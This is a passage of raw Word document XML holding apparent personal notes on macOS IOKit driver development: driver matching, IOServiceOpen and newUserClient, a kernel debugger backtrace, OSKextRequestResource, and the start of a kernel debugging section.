        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">spec ID of 2222 is plugged in to the computer. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE47C5" w:rsidRPr="00766C5B" w:rsidRDefault="00EE47C5" w:rsidP="00EE47C5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:firstLine="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Likewise, the driver class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>com_mycompany_driver_MyExternalDiskDriverUSB</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be instantiated and given a chance to probe the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">device whenever a USB device with a product </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ID of 3333 and a vendor ID of 4444 is plugged into the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>computer. The USB device will have a default probe score of 9000, which should make it the preferred</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>driver for this device</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Utopia-Regular" w:eastAsia="Utopia-Regular" w:cs="Utopia-Regular"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2828" w:rsidRDefault="007B52FD" w:rsidP="00EE2828">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc445313299"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Connection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRPr="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B52FD">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>* thread #5: tid = 0x0184, 0xffffff80158972ee kernel.development`IOService::</w:t>
      </w:r>
      <w:r w:rsidRPr="007B52FD">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>newUserClient</w:t>
      </w:r>
      <w:r w:rsidRPr="007B52FD">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>(this=0xffffff802965e200, owningTask=0xffffff8028bc8a10, securityID=0xffffff8028bc8a10, type=0, properties=0x0000000000000000, handler=0xffffff8135b23d88) + 78 at IOService.cpp:5187, name = '0xffffff80295d6680', queue = '0x0', stop reason = breakpoint 3.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRPr="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B52FD">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">  * frame #0: 0xffffff80158972ee kernel.development`IOService::newUserClient(this=0xffffff802965e200, owningTask=0xffffff8028bc8a10, securityID=0xffffff8028bc8a10, type=0, properties=0x0000000000000000, handler=0xffffff8135b23d88) + 78 at IOService.cpp:5187</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRPr="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B52FD">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #1: 0xffffff80158e1455 kernel.development`is_io_service_open_extended(_service=0xffffff802965e200, owningTask=&lt;unavailable&gt;, connect_type=0, properties=&lt;unavailable&gt;, propertiesCnt=&lt;unavailable&gt;, result=&lt;unavailable&gt;, connection=&lt;unavailable&gt;, ndr=&lt;unavailable&gt;) + 437 at IOUserClient.cpp:3029</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRPr="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B52FD">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #2: 0xffffff80153b83fe kernel.development`_Xio_service_open_extended(InHeadP=0xffffff8033fed760, OutHeadP=0xffffff80343b907c) + 206 at device_server.c:7873</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRPr="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B52FD">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #3: 0xffffff80152e92ac kernel.development`ipc_kobject_server(request=0xffffff8033fed700) + 252 at ipc_kobject.c:338</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRPr="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B52FD">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #4: 0xffffff80152c5a23 kernel.development`ipc_kmsg_send(kmsg=&lt;unavailable&gt;, option=3, send_timeout=0) + 275 at ipc_kmsg.c:1430</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRPr="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B52FD">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #5: 0xffffff80152ddc8d kernel.development`mach_msg_overwrite_trap(args=&lt;unavailable&gt;) + 205 at mach_msg.c:487</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRPr="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B52FD">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #6: 0xffffff80153da78a kernel.development`mach_call_munger64(state=0xffffff8028bdd1c0) + 442 at bsd_i386.c:542</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRPr="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B52FD">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #7: 0xffffff801540e666 kernel.development`hndl_mach_scall64 + 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRPr="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>IOServiceOpen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t>kr = IOServiceOpen(service, owningTask, type, &amp;driverConnection);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:r>
        <w:t xml:space="preserve">In the preceding code, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:r>
        <w:t xml:space="preserve">service represents the driver that the application wishes to connect to,which is found using the standard driver matching techniques described earlier, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:r>
        <w:t>owningTask represents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the running application, and </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:r>
        <w:t>type is an unsigned 32-bit integer whose value is interpreted by the driver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in any way that it chooses. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:r>
        <w:t>The driverConnection parameter is returned to the caller if the function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD"/>
    <w:p w:rsidR="007B52FD" w:rsidRPr="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">newUserClient </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD"/>
    <w:p w:rsidR="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:r>
        <w:t>IOReturn DriverClass::newUserClient (task_t owningTask, void* securityID, UInt32 type,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:r>
        <w:t>OSDictionary* properties, IOUserClient** handler)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD"/>
    <w:p w:rsidR="007B52FD" w:rsidRDefault="007B52FD" w:rsidP="007B52FD">
      <w:r w:rsidRPr="007B52FD">
        <w:t>setProperty("</w:t>
      </w:r>
      <w:r w:rsidRPr="007B52FD">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>IOUserClientClass</w:t>
      </w:r>
      <w:r w:rsidRPr="007B52FD">
        <w:t>", "MyUserClient");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F5028B" w:rsidRDefault="00F5028B" w:rsidP="007B52FD"/>
    <w:p w:rsidR="00F5028B" w:rsidRDefault="00F5028B" w:rsidP="007B52FD"/>
    <w:p w:rsidR="00F5028B" w:rsidRPr="007B52FD" w:rsidRDefault="00F5028B" w:rsidP="00F5028B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F5028B">
        <w:t>kern_return_t __cdecl is_io_object_get_class(io_object_t_0 object, char *className)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F5028B" w:rsidRDefault="00646EEA" w:rsidP="007B52FD">
      <w:r w:rsidRPr="00F5028B">
        <w:t>object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F5028B" w:rsidRPr="007B52FD" w:rsidRDefault="00F5028B" w:rsidP="007B52FD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE2828" w:rsidRDefault="00502F61" w:rsidP="00EE2828">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc445313300"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>File System Access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w:rsidR="00502F61" w:rsidRPr="007B52FD" w:rsidRDefault="00502F61" w:rsidP="00502F61">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00502F61">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OSKextRequestResource</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00502F61" w:rsidRDefault="00502F61" w:rsidP="00502F61"/>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OSReturn OSKextRequestResource</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const</w:t>
      </w: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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00502F61">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </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kextIdentifier</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const</w:t>
      </w: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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00502F61">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </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resourceName</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OSKextRequestResourceCallback   callback</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00502F61">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                          </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context</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OSKextRequestTag              </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requestTagOut</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w:t>
      </w:r>
      <w:r w:rsidRPr="00502F61">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00502F61">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSKext</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requestResource</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kextIdentifier</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resourceName</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        callback</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context</w:t>
      </w:r>
      <w:r w:rsidRPr="00502F61">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00502F61">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> requestTagOut</w:t>
      </w:r>
      <w:r w:rsidRPr="00502F61">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00502F61" w:rsidRPr="00502F61" w:rsidRDefault="00502F61" w:rsidP="00502F61">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00502F61">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00502F61" w:rsidRPr="00502F61" w:rsidRDefault="00502F61" w:rsidP="00502F61"/>
    <w:p w:rsidR="00EE2828" w:rsidRPr="006B4005" w:rsidRDefault="00EE2828" w:rsidP="00EE2828">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc445313301"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w:rsidR="00EE2828" w:rsidRPr="006B4005" w:rsidRDefault="00EE2828" w:rsidP="00EE2828">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc445313302"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w:rsidR="00EE2828" w:rsidRPr="006B4005" w:rsidRDefault="00EE2828" w:rsidP="00EE2828">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc445313303"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w:rsidR="00EE2828" w:rsidRPr="006B4005" w:rsidRDefault="00EE2828" w:rsidP="00EE2828">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc445313304"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w:rsidR="00EE2828" w:rsidRPr="006B4005" w:rsidRDefault="00EE2828" w:rsidP="00EE2828">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc445313305"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w:rsidR="00EE2828" w:rsidRPr="006B4005" w:rsidRDefault="00EE2828" w:rsidP="00EE2828">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc445313306"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w:rsidR="00EE2828" w:rsidRPr="006B4005" w:rsidRDefault="00EE2828" w:rsidP="00EE2828">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc445313307"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w:rsidR="00EE2828" w:rsidRPr="00EE2828" w:rsidRDefault="00EE2828" w:rsidP="00EE2828"/>
    <w:p w:rsidR="00B0420E" w:rsidRDefault="0014464C" w:rsidP="00B0420E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc445313308"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kernel Debug</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
      <w:r w:rsidR="00B0420E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C1313A" w:rsidRPr="006B4005" w:rsidRDefault="00C1313A" w:rsidP="00C1313A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc445313309"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kernel Background</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w:rsidR="00E73D5D" w:rsidRDefault="00E73D5D" w:rsidP="00C1313A"/>
    <w:p w:rsidR="00C1313A" w:rsidRPr="00C1313A" w:rsidRDefault="00C1313A" w:rsidP="00E73D5D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>User space :0x0-0x7fffffffffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6762B" w:rsidRPr="006B4005" w:rsidRDefault="00C1313A" w:rsidP="00A6762B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc445313310"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Debug args </w:t>
      </w:r>
      <w:r w:rsidR="00A6762B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Background</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w:rsidR="00A6762B" w:rsidRPr="00A6762B" w:rsidRDefault="00A6762B" w:rsidP="00A6762B"/>
    <w:p w:rsidR="00892A93" w:rsidRDefault="004106D2" w:rsidP="00892A93">
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidR="00892A93" w:rsidRPr="001D68D1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gist.github.com/steakknife/07df81ffe382d5f257d7</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00892A93" w:rsidRDefault="00892A93" w:rsidP="00892A93">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00892A93">
        <w:t>Two-box osx kernel development</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6762B" w:rsidRDefault="00A6762B" w:rsidP="00A6762B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
